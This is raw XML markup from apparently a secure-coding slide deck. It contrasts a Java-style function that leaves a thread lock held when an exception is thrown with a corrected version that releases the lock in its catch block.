                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>13       </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>catch</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> (Exception e)</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>14       {</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>15          </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>System.err.println</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="0810B8"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>"Something bad happened!"</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>);</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>16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 (FAILURE);</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>17       }</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>18       </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>return </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>(SUCCESS);</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>19    }</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="8" name="Straight Connector 8"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="5400000">
              <a:off x="-797021" y="2620272"/>
              <a:ext cx="4055853"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Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="372160" y="5373216"/>
            <a:ext cx="7924800" cy="617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r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>If an exception is thrown while the thread is locked, then the function will return without unlocking the thread.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49"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14" name="Title 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="447658"/>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Secure Coding …</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="Group 7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="161158" y="976293"/>
            <a:ext cx="8153400" cy="5156914"/>
            <a:chOff x="499158" y="592344"/>
            <a:chExt cx="8153400" cy="4055855"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Rounded Rectangle 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="499158" y="592344"/>
              <a:ext cx="8153400" cy="4055855"/>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l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> 1</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent2">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>boolean</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>DoStuff</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> ()</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> 2    {</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> 3       </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>try</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> 4       {</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> 5          </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>while</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> (condition == true)</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> 6          {</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> 7             </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ThreadLock</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>(TRUE);</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> 8             </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="339933"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>// do some stuff</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> 9             </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="339933"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>// an exception may be thrown</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>10             </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ThreadLock</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>(FALSE);</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>11          }</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>12       }</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>13       </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>catch</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> (Exception e)</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>14       {</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>15</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>16          </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>if</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isThreadLocked</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> == TRUE) </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ThreadLock</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>(FALSE);</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>17</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>18          </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>System.err.println</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>"Something bad happened!"</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>);</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>19          </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>return</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> (FAILURE);</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>20       }</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>21       </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>return </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>(SUCCESS);</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>22    }</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="17" name="Straight Connector 9"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="5400000">
              <a:off x="-797021" y="2620272"/>
              <a:ext cx="4055853"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2714722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147295" y="1082457"/>
            <a:ext cx="8153400" cy="2667000"/>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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent2">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>  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"user"</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2  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent2">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
